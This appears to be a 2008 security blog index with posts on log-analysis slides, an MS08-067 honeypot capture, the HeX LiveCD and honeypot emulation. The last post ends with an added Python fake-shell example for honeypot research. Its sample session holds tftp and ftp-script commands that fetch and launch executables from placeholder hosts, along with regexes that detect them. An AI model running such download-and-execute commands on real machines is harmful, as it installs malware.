My USENIX WASL 2008 slides are available

08 Dec 2008 Sebastien Tricaud

I gave a lecture on Picviz at the USENIX Workshop on the Analysis of System Logs (WASL 2008).

My slides ‘Picviz: finding a needle in a haystack’ are available right here.

I also ran for the Cray log analysis contest. Slides of the stuff I discovered are here.

I lost the contest by only one vote, but I was fighting against someone who knew a lot about Cray. He had, in my opinion, a better talk than mine, but I only started the contest after my morning lecture, and I preferred talking with people during lunch rather than doing the contest ;-)

MS08-067 exploitation in the wild

04 Nov 2008 Tillmann Werner

(This article was originally published at http://honeytrap.mwcollect.org/msexploit.)

If you have followed IT security related blogs or mailing lists lately, you are aware that a critical Server service vulnerability in Microsoft operating systems was published recently. I’m not going to talk about the details here; there are great resources available elsewhere (and the “reversing the ms08-067 patch” article isn’t the only advice about exploiting holes you get on that page).

OK, what have we got this time? One of our honeytrap sensors caught an MS08-067 exploitation attempt today, which we take as an example to show how to perform a quick analysis and check what it does. If you want to play along, get the (sanitized) pcap from here.

HeX LiveCD to be 2.0-RC2 soon.

04 Sep 2008 Kevin Foo

HeX LiveCD was created as a joint effort of the Honeynet Project Malaysian chapter and the RawPacket team. It is a Network Security Monitoring (NSM) centric Live CD, built on the principles of NSM, for analysts, by analysts. This project will eventually be forked into Hex Sensor and Hex Server to complete the cycle of NSM processes. HeX LiveCD is also the blueprint for HornyD; HornyD and HoneySuckle are the toolkits for the Malaysia Distributed Honeynet Project.

No more emulation!

27 Aug 2008 Tillmann Werner

Emulation is an important technology in honeypots and honeynets. It’s not always what we want, though, and here’s why. As you might know, most bots perform attacks in multiple stages, i.e., they

  • send some exploit code to the victim that opens a shell,
  • connect to that shell or let the shell connect back,
  • invoke commands to download the actual malware binary,
  • execute the malware.

Catching the exploit and providing a fake shell isn’t too hard, as shown in this post. But we certainly don’t want malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.
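As an added illustration (not code from honeytrap or from this post), here is a minimal fake shell in Python that answers the bot's commands but never runs anything: it records the download and execution stages and hands the download locations to a submission step. The session lines, hosts and file names are constructed, and the command patterns it recognises are only the common tftp/ftp-script forms.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample of a multi-stage bot session against the fake shell
# (illustrative commands, not taken from a real capture).
SAMPLE_SESSION = [
    "tftp -i 192.0.2.10 GET update.exe",
    "echo open 192.0.2.11 2121 > o&echo user x x >> o&echo get svc.exe >> o&echo bye >> o&ftp -n -s:o",
    "update.exe",
    "del o",
]

TFTP_RE = re.compile(r"tftp\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
FTP_OPEN_RE = re.compile(r"echo\s+open\s+(\S+)(?:\s+(\d+))?", re.I)
FTP_GET_RE = re.compile(r"echo\s+get\s+(\S+)", re.I)
EXEC_RE = re.compile(r"^\s*(\S+\.(?:exe|bat|cmd))\s*$", re.I)


@dataclass
class FakeShell:
    """Answers like cmd.exe would, but only records what the bot tried to
    fetch (stage 3) and run (stage 4); nothing is downloaded or executed."""
    downloads: list = field(default_factory=list)      # (proto, host, port, file)
    exec_attempts: list = field(default_factory=list)  # file names the bot tried to start
    _ftp_target: Optional[tuple] = None                # (host, port) from the last 'echo open'

    def handle(self, line: str) -> str:
        # Bots chain commands with '&'; look at each part separately.
        for part in re.split(r"\s*&+\s*", line):
            if m := TFTP_RE.search(part):
                self.downloads.append(("tftp", m.group(1), 69, m.group(2)))
            elif m := FTP_OPEN_RE.search(part):
                self._ftp_target = (m.group(1), int(m.group(2) or 21))
            elif (m := FTP_GET_RE.search(part)) and self._ftp_target:
                self.downloads.append(("ftp", *self._ftp_target, m.group(1)))
            elif m := EXEC_RE.match(part):
                self.exec_attempts.append(m.group(1))  # refused, but logged
        return "C:\\WINDOWS\\system32>"  # canned prompt keeps the bot talking


def artifacts_to_submit(shell: FakeShell) -> list:
    """Locations a collector fetches out-of-band and submits for analysis."""
    return [f"{p}://{h}:{port}/{f}" for p, h, port, f in shell.downloads]


if __name__ == "__main__":
    shell = FakeShell()
    for cmd in SAMPLE_SESSION:
        shell.handle(cmd)
    print(artifacts_to_submit(shell), shell.exec_attempts)
```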